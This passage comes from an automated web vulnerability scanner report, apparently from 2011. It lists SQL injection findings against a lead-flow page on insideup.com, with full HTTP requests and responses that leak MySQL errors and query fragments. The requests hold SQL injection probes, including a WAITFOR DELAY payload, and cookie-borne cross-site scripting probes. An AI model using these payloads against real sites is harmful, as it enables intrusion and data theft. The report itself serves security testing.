OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qnrdmgejv7b3ogmmlur3eq95k6; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.102. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[default] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[default] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[default] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT'; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=unea0bhog186iiucdmkgu2c2v1; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.103. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[javascript:netsparker(0x001194)] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[javascript:netsparker(0x001194)] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[javascript:netsparker(0x001194)] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o8il32emft2m4m33ee56m0urs0; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.104. http://www.insideup.com/ppc/leadflow/caad00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5

Request 2

GET /ppc/leadflow''/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:24:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/caad00/project.php was not found on this server.</p>

1.105. http://www.insideup.com/ppc/leadflow/caad00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow'/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 